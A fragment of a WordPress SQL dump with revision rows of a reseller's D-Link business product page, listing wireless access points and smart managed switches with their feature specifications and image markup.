height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP</p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W</p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Access Control List (ACL) feature to enhances network security</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Built-in SNMP MIB for remote Network Management Systems</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:30:50','2019-09-25 07:30:50','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3423,1,'2019-09-25 15:15:14','2019-09-25 07:15:14','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:15:14','2019-09-25 07:15:14','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3424,1,'2019-09-25 15:18:02','2019-09-25 07:18:02','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 